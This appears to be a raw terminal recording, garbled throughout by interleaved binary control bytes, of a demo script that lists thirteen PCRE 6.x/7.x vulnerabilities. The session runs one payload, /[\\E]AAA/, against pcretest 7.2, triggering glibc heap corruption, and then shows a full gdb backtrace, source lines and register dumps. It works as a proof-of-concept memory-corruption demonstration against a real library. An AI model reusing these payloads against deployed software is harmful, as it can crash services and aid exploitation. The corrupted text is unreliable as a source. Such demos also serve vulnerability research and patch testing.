>GP: user@vapor|0; >Gp>GF w>G 5 d>G  >G@ /demos/pcre >G : user@vapor|0; >G&s>G`o>Gu>Gr>Gc>Ge>G  >G .>GD.>Ga/>G6Nd>G#e>Gzm>Gwos.sh >G  >G^ : demo@vapor|0; >G[h>Gza>Gn>G^ dle_product >G7  >G Bbash: config.sh: line 37: syntax error near unexpected token `(' >G )bash: config.sh: line 37: `function ()' >G L00. lone \E with trigger char (6.x+) >GB C01. matched \E deref (6.x+) >Gu I02. grouped string with \E (6.x+) >G H03. \E in character class (7.x+) >G J04. not a single char class (7.x+) >G C05. ditto, variation (7.x+) >G; J06. optimised cond in group (6.x+) >Gk <07. variation (6.x+) >G D08. backtrack too far (6.x+) >G B09. another variant (6.x+) >G J10. seeking past end for \c (7.x+) >G0 B11. integer overflow (7.x) >Ga B12. integer overflow (7.x) >G} select vulnerability: ?GD3?G  ?GS (\E in character class (7.x+) selected. ?G  ?G payload: /[\\E]AAA/\ndata\n ?G press enter to run. ?Gs ?G\ [1] 29778 ?GPCRE version 7.2 2007-06-19 ?G9 re> ?GI*** glibc detected *** free(): invalid next size (fast): 0x08077ac8 *** ?G../demos.sh: line 80: 29780 Aborted (core dumped) /usr/local/encap/pcre-7.2/bin/pcretest <<(echo -e "$payload") ?G-[1]+ Exit 134 ( eval $cmd ) ?GCore file generated. ?G8Opening gdb ... ?G@IUsing host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1". ?GA warning: ?GA7Can't read pathname for load map: Input/output error. ?GEGReading symbols from /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0...?G(Fdone. ?GFDLoaded symbols for /usr/local/encap/pcre-7.2/lib/libpcreposix.so.0 ?G`GBReading symbols from /usr/local/encap/pcre-7.2/lib/libpcre.so.0...?GhOdone. ?GO?Loaded symbols for /usr/local/encap/pcre-7.2/lib/libpcre.so.0 ?GP4Reading symbols from /lib/tls/i686/cmov/libc.so.6...?G&vFReading symbols from /usr/lib/debug/lib/tls/i686/cmov/libc-2.3.6.so...?GRdone. ?Gdone. ?GA1Loaded symbols for /lib/tls/i686/cmov/libc.so.6 ?G!*Reading symbols from /lib/ld-linux.so.2...?G6Reading symbols from /usr/lib/debug/lib/ld-2.3.6.so...?Gedone. ?GĹdone. ?G'Loaded symbols for /lib/ld-linux.so.2 ?G%ACore was generated by `/usr/local/encap/pcre-7.2/bin/pcretest'. ?G<,Program terminated with signal 6, Aborted. ?G(#0 0xffffe402 in __kernel_vsyscall () ?G|>> ?Gb ?Gt ?G9  ?G (#0 0xffffe402 in __kernel_vsyscall () ?GU >#1 0x43b3d9a1 in raise () from /lib/tls/i686/cmov/libc.so.6 ?G >#2 0x43b3f2b9 in abort () from /lib/tls/i686/cmov/libc.so.6 ?GІ G#3 0x43b7187a in __libc_message () from /lib/tls/i686/cmov/libc.so.6 ?G B#4 0x43b77fd4 in _int_free () from /lib/tls/i686/cmov/libc.so.6 ?GA =#5 0x43b7834a in free () from /lib/tls/i686/cmov/libc.so.6 ?G: @#6 0x0804a8ed in new_free (block=0x8077ac8) at pcretest.c:556 ?GS #7 0xf7fdf824 in pcre_compile2 (pattern=0x8053009 "[\\E]AAA", options=0x0, errorcodeptr=0x0, errorptr=0xffffc970, erroroffset=0xffffc968, tables=0xf7ff6500 "") ?G~  at pcre_compile.c:5701 ?Gؠ #8 0xf7fdf123 in pcre_compile (pattern=0x8053009 "[\\E]AAA", options=0x0, errorptr=0xffffc970, erroroffset=0xffffc968, tables=0x0) at pcre_compile.c:5419 ?G) G#9 0x0804c745 in main (argc=0x1, argv=0xffffd3c4) at pcretest.c:1242 ?GZ >> ?GYS u ?Gd p ?G  ?G7 ?Gyf ?Gg#7 0xf7fdf824 in pcre_compile2 (pattern=0x8053009 "[\\E]AAA", options=0x0, errorcodeptr=0x0, errorptr=0xffffc970, erroroffset=0xffffc968, tables=0xf7ff6500 "") at pcre_compile.c:5701 ?Gj5701 (pcre_free)(re); ?Gk>>?G6p?GL ?Gߞ r?G e?GI ?GJ$1 = (real_pcre *) 0x8077ac8 ?GJ>>?Gl?G ?G85696 ?GKE5697 /* Failed to compile, or error while post-processing */ 5698 ?G]=5699 if (errorcode != 0) 5700 { 5701 (pcre_free)(re); ?Gm!5702 PCRE_EARLY_ERROR_RETURN: ?G}65703 *erroroffset = ptr - (const uschar *)pattern; ?GN5704 PCRE_EARLY_ERROR_RETURN2: 5705 *errorptr = error_texts[errorcode]; ?G>>?G::u?GMp?G ?Gq ?G9I?Gl?GX  ?G5?G6?G9?Gw6?G$  ?G 5691 ?G M5692 /* Give an error if there's back reference to a non-existent capturing ?G 5693 subpattern. */ 5694 ?G R5695 if (errorcode == 0 && re->top_backref > re->top_bracket) errorcode = ERR15; ?G 5696 ?G E5697 /* Failed to compile, or error while post-processing */ 5698 ?G- $5699 if (errorcode != 0) 5700 { ?Gf >>?Gp?G ?G *?G X r?G,e?G ?G$2 = {?G7magic_number = 0x50435245, size = 0x37, options = 0x0, ?G4dummy1 = 0x0, top_bracket = 0x0, top_backref = 0x0, ?GÀ>first_byte = 0x0, req_byte = 0x0, name_table_offset = 0x28, ?GՀ+ name_entry_size = 0x0, name_count = 0x0, ?G/ref_count = 0x0, tables = 0x0, nullpad = 0x0} ?G>> ?Gi ?G1n ?Gn f ?G(> o ?Gnd  ?Gr r ?Gz'e!?Gk=g!?G * !?G*eax 0x0!?G* 0x0 ecx 0x7454!?G* 0x7454 !?G*edx 0x6 0x6 !?G*ebx 0xf7ff7a80!?G +& 0xf7ff7a80 esp 0xffffa670!?G+& 0xffffa670 ebp 0xffffb768!?G++ 0xffffb768 !?G:+&esi 0xffffd3c4 0xffffd3c4 !?GI+"edi 0x8053011 0x8053011!?GW+ eip 0xf7fdf824!?G+" 0xf7fdf824 !?G+(eflags 0x10246 [ PF ZF IF RF ] !?G+cs 0x23 0x23 !?G+ss 0x2b 0x2b !?G+ds 0x2b 0x2b !?G+es 0x2b 0x2b !?G+fs 0x0 0x0 !?G+gs 0x63 0x63 !?G>,>>$?G quit $?G) : demo@vapor|0; %?Ga exit